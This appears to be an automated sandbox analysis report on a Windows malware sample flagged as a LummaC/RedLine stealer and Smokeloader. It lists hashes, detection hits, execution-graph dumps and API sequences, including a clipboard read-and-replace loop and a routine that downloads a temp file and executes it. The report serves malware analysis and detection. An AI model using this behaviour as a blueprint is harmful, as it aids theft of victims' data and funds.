Commandline: "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe"
Imagebase: 0x400000
File size: 361'984 bytes
MD5 hash: D88E2431ABAC06BDF0CD03C034B3E5E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 62%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 03:20:38
Start date: 15/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
Imagebase: 0xd80000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 3.7%
Signature Coverage: 5.7%
Total number of Nodes: 760
Total number of Limit Nodes: 21
                                                                                                                                                                                                                                                                                      execution_graph 64978 24c003c 64979 24c0049 64978->64979 64993 24c0e0f SetErrorMode SetErrorMode 64979->64993 64984 24c0265 64985 24c02ce VirtualProtect 64984->64985 64987 24c030b 64985->64987 64986 24c0439 VirtualFree 64991 24c05f4 LoadLibraryA 64986->64991 64992 24c04be 64986->64992 64987->64986 64988 24c04e3 LoadLibraryA 64988->64992 64990 24c08c7 64991->64990 64992->64988 64992->64991 64994 24c0223 64993->64994 64995 24c0d90 64994->64995 64996 24c0dad 64995->64996 64997 24c0dbb GetPEB 64996->64997 64998 24c0238 VirtualAlloc 64996->64998 64997->64998 64998->64984 64999 402c04 InternetOpenW 65000 402e55 64999->65000 65003 402c37 Concurrency::details::ResourceManager::InitializeRMBuffers 64999->65003 65020 40f8cf 65000->65020 65002 402e64 65011 42defd 65003->65011 65006 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 65007 402e17 65006->65007 65008 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 65007->65008 65009 402e29 InternetOpenUrlW 65008->65009 65009->65000 65010 402e44 InternetCloseHandle InternetCloseHandle 65009->65010 65010->65000 65012 42df1a 65011->65012 65014 42df0c 65011->65014 65027 42eac9 20 API calls _Atexit 65012->65027 65014->65012 65017 42df4a 65014->65017 65016 402e09 65016->65006 65017->65016 65029 42eac9 20 API calls _Atexit 65017->65029 65019 42df24 65028 42a59d 26 API calls _Deallocate 65019->65028 65021 40f8d8 65020->65021 65022 40f8da IsProcessorFeaturePresent 65020->65022 65021->65002 65024 40f94d 65022->65024 65030 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65024->65030 65026 40fa30 65026->65002 65027->65019 65028->65016 65029->65019 65030->65026 65031 40fc06 65032 40fc12 ___DestructExceptionObject 
65031->65032 65060 40fff3 65032->65060 65034 40fc19 65035 40fd6c 65034->65035 65039 40fc43 65034->65039 65081 4104d3 4 API calls 2 library calls 65035->65081 65037 40fd73 65082 42ffc9 28 API calls _Atexit 65037->65082 65049 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65039->65049 65075 42fcee 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65039->65075 65040 40fd79 65083 42ff7b 28 API calls _Atexit 65040->65083 65043 40fc5c 65045 40fc62 65043->65045 65076 42fc92 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65043->65076 65044 40fd81 65047 40fce3 65071 4105ed 65047->65071 65049->65047 65077 42a366 167 API calls 4 library calls 65049->65077 65051 40fce9 65052 40fcfe 65051->65052 65078 410623 GetModuleHandleW 65052->65078 65054 40fd05 65054->65037 65055 40fd09 65054->65055 65056 40fd12 65055->65056 65079 42ff6c 28 API calls _Atexit 65055->65079 65080 410182 13 API calls 2 library calls 65056->65080 65059 40fd1a 65059->65045 65061 40fffc 65060->65061 65084 41077b IsProcessorFeaturePresent 65061->65084 65063 410008 65085 428827 10 API calls 3 library calls 65063->65085 65065 41000d 65070 410011 65065->65070 65086 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65065->65086 65067 41001a 65068 410028 65067->65068 65087 428850 8 API calls 3 library calls 65067->65087 65068->65034 65070->65034 65088 426830 65071->65088 65073 410600 GetStartupInfoW 65074 410613 65073->65074 65074->65051 65075->65043 65076->65049 65077->65047 65078->65054 65079->65056 65080->65059 65081->65037 65082->65040 65083->65044 65084->65063 65085->65065 65086->65067 65087->65070 65089 426847 65088->65089 65089->65073 65089->65089 65090 432785 65095 432553 65090->65095 65093 4327ad 65096 43257e 65095->65096 65103 4326c7 65096->65103 65110 43c8ce 170 API calls 2 library calls 65096->65110 65098 432771 65114 42a59d 26 API calls _Deallocate 65098->65114 65100 
4326d0 65100->65093 65107 43d01c 65100->65107 65102 432711 65102->65103 65111 43c8ce 170 API calls 2 library calls 65102->65111 65103->65100 65113 42eac9 20 API calls _Atexit 65103->65113 65105 432730 65105->65103 65112 43c8ce 170 API calls 2 library calls 65105->65112 65115 43c9f1 65107->65115 65109 43d037 65109->65093 65110->65102 65111->65105 65112->65103 65113->65098 65114->65100 65118 43c9fd ___DestructExceptionObject 65115->65118 65116 43ca0b 65133 42eac9 20 API calls _Atexit 65116->65133 65118->65116 65120 43ca44 65118->65120 65119 43ca10 65134 42a59d 26 API calls _Deallocate 65119->65134 65126 43cfcb 65120->65126 65125 43ca1a std::_Locinfo::_Locinfo_ctor 65125->65109 65136 43f941 65126->65136 65129 43ca68 65135 43ca91 LeaveCriticalSection __wsopen_s 65129->65135 65133->65119 65134->65125 65135->65125 65137 43f964 65136->65137 65138 43f94d 65136->65138 65139 43f983 65137->65139 65140 43f96c 65137->65140 65213 42eac9 20 API calls _Atexit 65138->65213 65217 434faa 10 API calls 2 library calls 65139->65217 65215 42eac9 20 API calls _Atexit 65140->65215 65144 43f952 65214 42a59d 26 API calls _Deallocate 65144->65214 65145 43f971 65216 42a59d 26 API calls _Deallocate 65145->65216 65146 43f98a MultiByteToWideChar 65149 43f9b9 65146->65149 65150 43f9a9 GetLastError 65146->65150 65219 4336a7 21 API calls 3 library calls 65149->65219 65218 42ea93 20 API calls 2 library calls 65150->65218 65151 43cfe1 65151->65129 65160 43d03c 65151->65160 65154 43f9c1 65155 43f9c8 MultiByteToWideChar 65154->65155 65158 43f9e9 65154->65158 65157 43f9dd GetLastError 65155->65157 65155->65158 65156 43346a _free 20 API calls 65156->65151 65220 42ea93 20 API calls 2 library calls 65157->65220 65158->65156 65221 43cd9f 65160->65221 65163 43d087 65239 43977e 65163->65239 65164 43d06e 65253 42eab6 20 API calls _Atexit 65164->65253 65167 43d073 65254 42eac9 20 API calls _Atexit 65167->65254 65168 43d08c 65169 43d095 65168->65169 65170 43d0ac 65168->65170 65255 42eab6 20 API calls _Atexit 
65169->65255 65252 43cd0a CreateFileW 65170->65252 65174 43d09a 65256 42eac9 20 API calls _Atexit 65174->65256 65175 43d162 GetFileType 65178 43d1b4 65175->65178 65179 43d16d GetLastError 65175->65179 65177 43d137 GetLastError 65258 42ea93 20 API calls 2 library calls 65177->65258 65261 4396c7 21 API calls 3 library calls 65178->65261 65259 42ea93 20 API calls 2 library calls 65179->65259 65180 43d0e5 65180->65175 65180->65177 65257 43cd0a CreateFileW 65180->65257 65184 43d17b CloseHandle 65184->65167 65187 43d1a4 65184->65187 65186 43d12a 65186->65175 65186->65177 65260 42eac9 20 API calls _Atexit 65187->65260 65188 43d1d5 65191 43d221 65188->65191 65262 43cf1b 169 API calls 4 library calls 65188->65262 65190 43d1a9 65190->65167 65195 43d24e 65191->65195 65263 43cabd 167 API calls 4 library calls 65191->65263 65194 43d247 65194->65195 65197 43d25f 65194->65197 65264 4335cd 29 API calls 2 library calls 65195->65264 65198 43d009 65197->65198 65199 43d2dd CloseHandle 65197->65199 65207 43346a 65198->65207 65265 43cd0a CreateFileW 65199->65265 65201 43d308 65202 43d312 GetLastError 65201->65202 65203 43d257 65201->65203 65266 42ea93 20 API calls 2 library calls 65202->65266 65203->65198 65205 43d31e 65267 439890 21 API calls 3 library calls 65205->65267 65208 43349e _free 65207->65208 65209 433475 HeapFree 65207->65209 65208->65129 65209->65208 65210 43348a 65209->65210 65290 42eac9 20 API calls _Atexit 65210->65290 65212 433490 GetLastError 65212->65208 65213->65144 65214->65151 65215->65145 65216->65151 65217->65146 65218->65151 65219->65154 65220->65158 65222 43cdc0 65221->65222 65223 43cdda 65221->65223 65222->65223 65275 42eac9 20 API calls _Atexit 65222->65275 65268 43cd2f 65223->65268 65226 43cdcf 65276 42a59d 26 API calls _Deallocate 65226->65276 65228 43ce41 65236 43ce94 65228->65236 65279 42ffdf 26 API calls 2 library calls 65228->65279 65229 43ce12 65229->65228 65277 42eac9 20 API calls _Atexit 65229->65277 65232 43ce8f 65234 43cf0e 65232->65234 
65232->65236 65233 43ce36 65278 42a59d 26 API calls _Deallocate 65233->65278 65280 42a5ca 11 API calls _Atexit 65234->65280 65236->65163 65236->65164 65238 43cf1a 65240 43978a ___DestructExceptionObject 65239->65240 65283 42e3ed EnterCriticalSection 65240->65283 65242 4397d8 65284 439887 65242->65284 65243 4397b6 65287 43955d 21 API calls 3 library calls 65243->65287 65244 439791 65244->65242 65244->65243 65249 439824 EnterCriticalSection 65244->65249 65247 439801 std::_Locinfo::_Locinfo_ctor 65247->65168 65248 4397bb 65248->65242 65288 4396a4 EnterCriticalSection 65248->65288 65249->65242 65250 439831 LeaveCriticalSection 65249->65250 65250->65244 65252->65180 65253->65167 65254->65198 65255->65174 65256->65167 65257->65186 65258->65167 65259->65184 65260->65190 65261->65188 65262->65191 65263->65194 65264->65203 65265->65201 65266->65205 65267->65203 65269 43cd47 65268->65269 65270 43cd62 65269->65270 65281 42eac9 20 API calls _Atexit 65269->65281 65270->65229 65272 43cd86 65282 42a59d 26 API calls _Deallocate 65272->65282 65274 43cd91 65274->65229 65275->65226 65276->65223 65277->65233 65278->65228 65279->65232 65280->65238 65281->65272 65282->65274 65283->65244 65289 42e435 LeaveCriticalSection 65284->65289 65286 43988e 65286->65247 65287->65248 65288->65242 65289->65286 65290->65212 65291 43410a 65292 434116 ___DestructExceptionObject 65291->65292 65293 434122 65292->65293 65294 434139 65292->65294 65325 42eac9 20 API calls _Atexit 65293->65325 65304 42caff EnterCriticalSection 65294->65304 65297 434127 65326 42a59d 26 API calls _Deallocate 65297->65326 65298 434149 65305 434186 65298->65305 65301 434132 std::_Locinfo::_Locinfo_ctor 65302 434155 65327 43417c LeaveCriticalSection __fread_nolock 65302->65327 65304->65298 65306 434194 65305->65306 65307 4341ae 65305->65307 65338 42eac9 20 API calls _Atexit 65306->65338 65328 432908 65307->65328 65310 434199 65339 42a59d 26 API calls _Deallocate 65310->65339 65311 4341b7 65335 4347d3 65311->65335 65315 4342bb 
65317 4342c8 65315->65317 65321 43426e 65315->65321 65316 43423f 65319 43425c 65316->65319 65316->65321 65341 42eac9 20 API calls _Atexit 65317->65341 65340 43449f 31 API calls 4 library calls 65319->65340 65324 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65321->65324 65342 43431b 30 API calls 2 library calls 65321->65342 65322 434266 65322->65324 65324->65302 65325->65297 65326->65301 65327->65301 65329 432914 65328->65329 65330 432929 65328->65330 65343 42eac9 20 API calls _Atexit 65329->65343 65330->65311 65332 432919 65344 42a59d 26 API calls _Deallocate 65332->65344 65334 432924 65334->65311 65345 434650 65335->65345 65337 4341d3 65337->65315 65337->65316 65337->65324 65338->65310 65339->65324 65340->65322 65341->65324 65342->65324 65343->65332 65344->65334 65346 43465c ___DestructExceptionObject 65345->65346 65347 434664 65346->65347 65352 43467c 65346->65352 65380 42eab6 20 API calls _Atexit 65347->65380 65349 434730 65385 42eab6 20 API calls _Atexit 65349->65385 65350 434669 65381 42eac9 20 API calls _Atexit 65350->65381 65352->65349 65355 4346b4 65352->65355 65354 434735 65386 42eac9 20 API calls _Atexit 65354->65386 65370 4396a4 EnterCriticalSection 65355->65370 65358 43473d 65387 42a59d 26 API calls _Deallocate 65358->65387 65359 4346ba 65361 4346f3 65359->65361 65362 4346de 65359->65362 65371 434755 65361->65371 65382 42eac9 20 API calls _Atexit 65362->65382 65364 434671 std::_Locinfo::_Locinfo_ctor 65364->65337 65366 4346e3 65383 42eab6 20 API calls _Atexit 65366->65383 65367 4346ee 65384 434728 LeaveCriticalSection __wsopen_s 65367->65384 65370->65359 65388 439921 65371->65388 65373 434767 65374 434780 SetFilePointerEx 65373->65374 65375 43476f 65373->65375 65377 434798 GetLastError 65374->65377 65379 434774 65374->65379 65401 42eac9 20 API calls _Atexit 65375->65401 65402 42ea93 20 API calls 2 library calls 65377->65402 65379->65367 65380->65350 65381->65364 65382->65366 65383->65367 65384->65364 65385->65354 65386->65358 65387->65364 65389 
439943 65388->65389 65390 43992e 65388->65390 65395 439968 65389->65395 65405 42eab6 20 API calls _Atexit 65389->65405 65403 42eab6 20 API calls _Atexit 65390->65403 65392 439933 65404 42eac9 20 API calls _Atexit 65392->65404 65395->65373 65396 439973 65406 42eac9 20 API calls _Atexit 65396->65406 65398 43993b 65398->65373 65399 43997b 65407 42a59d 26 API calls _Deallocate 65399->65407 65401->65379 65402->65379 65403->65392 65404->65398 65405->65396 65406->65399 65407->65398 65408 4332de 65409 4332eb 65408->65409 65412 433303 65408->65412 65458 42eac9 20 API calls _Atexit 65409->65458 65411 4332f0 65459 42a59d 26 API calls _Deallocate 65411->65459 65414 43335e 65412->65414 65422 4332fb 65412->65422 65460 434ccd 21 API calls 2 library calls 65412->65460 65415 432908 __fread_nolock 26 API calls 65414->65415 65417 433376 65415->65417 65428 432e16 65417->65428 65419 43337d 65420 432908 __fread_nolock 26 API calls 65419->65420 65419->65422 65421 4333a9 65420->65421 65421->65422 65423 432908 __fread_nolock 26 API calls 65421->65423 65424 4333b7 65423->65424 65424->65422 65425 432908 __fread_nolock 26 API calls 65424->65425 65426 4333c7 65425->65426 65427 432908 __fread_nolock 26 API calls 65426->65427 65427->65422 65429 432e22 ___DestructExceptionObject 65428->65429 65430 432e42 65429->65430 65431 432e2a 65429->65431 65433 432f08 65430->65433 65438 432e7b 65430->65438 65527 42eab6 20 API calls _Atexit 65431->65527 65534 42eab6 20 API calls _Atexit 65433->65534 65434 432e2f 65528 42eac9 20 API calls _Atexit 65434->65528 65436 432f0d 65535 42eac9 20 API calls _Atexit 65436->65535 65440 432e8a 65438->65440 65441 432e9f 65438->65441 65529 42eab6 20 API calls _Atexit 65440->65529 65461 4396a4 EnterCriticalSection 65441->65461 65443 432e97 65536 42a59d 26 API calls _Deallocate 65443->65536 65445 432ea5 65447 432ec1 65445->65447 65448 432ed6 65445->65448 65446 432e8f 65530 42eac9 20 API calls _Atexit 65446->65530 65531 42eac9 20 API calls _Atexit 65447->65531 65462 432f29 
65448->65462 65450 432e37 std::_Locinfo::_Locinfo_ctor 65450->65419 65454 432ec6 65532 42eab6 20 API calls _Atexit 65454->65532 65455 432ed1 65533 432f00 LeaveCriticalSection __wsopen_s 65455->65533 65458->65411 65459->65422 65460->65414 65461->65445 65463 432f53 65462->65463 65464 432f3b 65462->65464 65466 4332bd 65463->65466 65476 432f98 65463->65476 65546 42eab6 20 API calls _Atexit 65464->65546 65564 42eab6 20 API calls _Atexit 65466->65564 65467 432f40 65547 42eac9 20 API calls _Atexit 65467->65547 65470 4332c2 65565 42eac9 20 API calls _Atexit 65470->65565 65472 432fa3 65548 42eab6 20 API calls _Atexit 65472->65548 65474 432f48 65474->65455 65475 432fa8 65549 42eac9 20 API calls _Atexit 65475->65549 65476->65472 65476->65474 65479 432fd3 65476->65479 65477 432fb0 65566 42a59d 26 API calls _Deallocate 65477->65566 65481 432fec 65479->65481 65482 433012 65479->65482 65483 43302e 65479->65483 65481->65482 65487 432ff9 65481->65487 65550 42eab6 20 API calls _Atexit 65482->65550 65553 4336a7 21 API calls 3 library calls 65483->65553 65486 433017 65551 42eac9 20 API calls _Atexit 65486->65551 65537 43d365 65487->65537 65488 433045 65493 43346a _free 20 API calls 65488->65493 65491 433197 65494 43320d 65491->65494 65497 4331b0 GetConsoleMode 65491->65497 65492 43301e 65552 42a59d 26 API calls _Deallocate 65492->65552 65496 43304e 65493->65496 65499 433211 ReadFile 65494->65499 65498 43346a _free 20 API calls 65496->65498 65497->65494 65502 4331c1 65497->65502 65503 433055 65498->65503 65500 433285 GetLastError 65499->65500 65501 43322b 65499->65501 65504 433292 65500->65504 65505 4331e9 65500->65505 65501->65500 65506 433202 65501->65506 65502->65499 65507 4331c7 ReadConsoleW 65502->65507 65508 43307a 65503->65508 65509 43305f 65503->65509 65562 42eac9 20 API calls _Atexit 65504->65562 65524 433029 __fread_nolock 65505->65524 65559 42ea93 20 API calls 2 library calls 65505->65559 65519 433250 65506->65519 65520 433267 65506->65520 65506->65524 65507->65506 65512 
4331e3 GetLastError 65507->65512 65556 4347ee 65508->65556 65554 42eac9 20 API calls _Atexit 65509->65554 65512->65505 65513 43346a _free 20 API calls 65513->65474 65515 433297 65563 42eab6 20 API calls _Atexit 65515->65563 65517 433064 65555 42eab6 20 API calls _Atexit 65517->65555 65560 432c45 31 API calls 3 library calls 65519->65560 65523 43327e 65520->65523 65520->65524 65561 432a85 29 API calls __fread_nolock 65523->65561 65524->65513 65526 433283 65526->65524 65527->65434 65528->65450 65529->65446 65530->65443 65531->65454 65532->65455 65533->65450 65534->65436 65535->65443 65536->65450 65538 43d372 65537->65538 65539 43d37f 65537->65539 65567 42eac9 20 API calls _Atexit 65538->65567 65542 43d38b 65539->65542 65568 42eac9 20 API calls _Atexit 65539->65568 65541 43d377 65541->65491 65542->65491 65544 43d3ac 65569 42a59d 26 API calls _Deallocate 65544->65569 65546->65467 65547->65474 65548->65475 65549->65477 65550->65486 65551->65492 65552->65524 65553->65488 65554->65517 65555->65524 65557 434755 __fread_nolock 28 API calls 65556->65557 65558 434804 65557->65558 65558->65487 65559->65524 65560->65524 65561->65526 65562->65515 65563->65524 65564->65470 65565->65477 65566->65474 65567->65541 65568->65544 65569->65541 65570 a3983e 65571 a3984d 65570->65571 65574 a39fde 65571->65574 65579 a39ff9 65574->65579 65575 a3a002 CreateToolhelp32Snapshot 65576 a3a01e Module32First 65575->65576 65575->65579 65577 a39856 65576->65577 65578 a3a02d 65576->65578 65581 a39c9d 65578->65581 65579->65575 65579->65576 65582 a39cc8 65581->65582 65583 a39d11 65582->65583 65584 a39cd9 VirtualAlloc 65582->65584 65583->65583 65584->65583 65585 402bad RegCreateKeyExW 65586 402bdb RegSetValueExW 65585->65586 65587 402bef 65585->65587 65586->65587 65588 402bf4 RegCloseKey 65587->65588 65589 402bfd 65587->65589 65588->65589 65590 404b8e 65591 404b9a Concurrency::details::ResourceManager::Version 65590->65591 65596 40fb0c 65591->65596 65595 404bba 
Concurrency::details::ResourceManager::Version std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65598 40fb11 65596->65598 65599 404ba3 65598->65599 65601 40fb2d Concurrency::details::SchedulerBase::Initialize 65598->65601 65620 42ad7e 65598->65620 65627 42f450 7 API calls 2 library calls 65598->65627 65604 4051d0 65599->65604 65628 42860d RaiseException 65601->65628 65603 4103cc 65605 4051dc Concurrency::details::ResourceManager::Version __Cnd_init 65604->65605 65607 4051f4 __Mtx_init 65605->65607 65639 40ce32 28 API calls std::_Throw_Cpp_error 65605->65639 65608 40521b 65607->65608 65640 40ce32 28 API calls std::_Throw_Cpp_error 65607->65640 65631 4010ea 65608->65631 65614 40526a 65616 40527f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65614->65616 65642 401128 30 API calls std::_Cnd_waitX 65614->65642 65643 401109 65616->65643 65619 4052a4 Concurrency::details::ResourceManager::Version 65619->65595 65625 4336a7 std::_Locinfo::_Locinfo_ctor 65620->65625 65621 4336e5 65630 42eac9 20 API calls _Atexit 65621->65630 65622 4336d0 RtlAllocateHeap 65624 4336e3 65622->65624 65622->65625 65624->65598 65625->65621 65625->65622 65629 42f450 7 API calls 2 library calls 65625->65629 65627->65598 65628->65603 65629->65625 65630->65624 65647 40d313 65631->65647 65634 401103 65636 40cef3 65634->65636 65671 42e114 65636->65671 65639->65607 65640->65608 65641 40ce32 28 API calls std::_Throw_Cpp_error 65641->65614 65642->65614 65644 401115 __Mtx_unlock 65643->65644 65645 401122 65644->65645 65996 40ce32 28 API calls std::_Throw_Cpp_error 65644->65996 65645->65619 65651 40d06d 65647->65651 65650 40ce32 28 API calls std::_Throw_Cpp_error 65650->65634 65652 40d0c3 65651->65652 65653 40d095 GetCurrentThreadId 65651->65653 65654 40d0c7 GetCurrentThreadId 65652->65654 65655 40d0ed 65652->65655 65656 40d0a0 GetCurrentThreadId 65653->65656 65661 40d0bb 65653->65661 65657 40d0d6 65654->65657 65658 40d186 GetCurrentThreadId 65655->65658 65662 40d10d 65655->65662 65656->65661 65659 40d1dd GetCurrentThreadId 
65657->65659 65657->65661 65658->65657 65659->65661 65660 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65663 4010f6 65660->65663 65661->65660 65669 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65662->65669 65663->65634 65663->65650 65666 40d145 GetCurrentThreadId 65666->65657 65667 40d118 __Xtime_diff_to_millis2 65666->65667 65667->65657 65667->65661 65667->65666 65670 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65667->65670 65669->65667 65670->65667 65672 42e121 65671->65672 65673 42e135 65671->65673 65694 42eac9 20 API calls _Atexit 65672->65694 65685 42e0cb 65673->65685 65676 42e126 65695 42a59d 26 API calls _Deallocate 65676->65695 65679 42e14a CreateThread 65681 42e169 GetLastError 65679->65681 65684 42e175 65679->65684 65716 42dfc0 65679->65716 65680 405257 65680->65614 65680->65641 65696 42ea93 20 API calls 2 library calls 65681->65696 65697 42e03d 65684->65697 65705 434d2a 65685->65705 65688 43346a _free 20 API calls 65689 42e0e4 65688->65689 65690 42e103 65689->65690 65691 42e0eb GetModuleHandleExW 65689->65691 65692 42e03d __Thrd_start 22 API calls 65690->65692 65691->65690 65693 42e10d 65692->65693 65693->65679 65693->65684 65694->65676 65695->65680 65696->65684 65698 42e04a 65697->65698 65699 42e06e 65697->65699 65700 42e050 CloseHandle 65698->65700 65701 42e059 65698->65701 65699->65680 65700->65701 65702 42e068 65701->65702 65703 42e05f FreeLibrary 65701->65703 65704 43346a _free 20 API calls 65702->65704 65703->65702 65704->65699 65706 434d37 65705->65706 65707 434d77 65706->65707 65708 434d62 HeapAlloc 65706->65708 65711 434d4b std::_Locinfo::_Locinfo_ctor 65706->65711 65715 42eac9 20 API calls _Atexit 65707->65715 65709 434d75 65708->65709 65708->65711 65712 42e0db 65709->65712 65711->65707 65711->65708 65714 42f450 7 API calls 2 library calls 65711->65714 65712->65688 65714->65711 65715->65712 65717 42dfcc _Atexit 65716->65717 65718 42dfd3 GetLastError ExitThread 65717->65718 65719 42dfe0 
[Control-flow graph edge list from the Joe Sandbox IDA plugin (graphviz node/edge dump, not reproduced here). Recoverable content: the clipboard loop at 0x4016DF (Sleep, OpenClipboard, GetClipboardData, GlobalLock, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, GlobalFree, CloseClipboard, Sleep, then back to OpenClipboard); the WinINet download routine at 0x4029F4 (InternetOpenW, InternetOpenUrlW, GetTempPathW, GetTempFileNameW, CreateFileW, an InternetReadFile/WriteFile loop, CloseHandle, ShellExecuteExW, WaitForSingleObject, CloseHandle, InternetCloseHandle twice); a thread-exit helper at 0x42E074 (ExitThread, CloseHandle, FreeLibraryAndExitThread); a window procedure at 0x40239E (DefWindowProcW, PostQuitMessage) with a path into 0x4029F4; and C runtime / STL helpers around them (WideCharToMultiByte, GetLastError/SetLastError, _free, critical-section wrappers, DuplicateHandle).]

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                                      • String ID: i
                                                                                                                                                                                                                                                                                      • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                                                      • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                                      • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
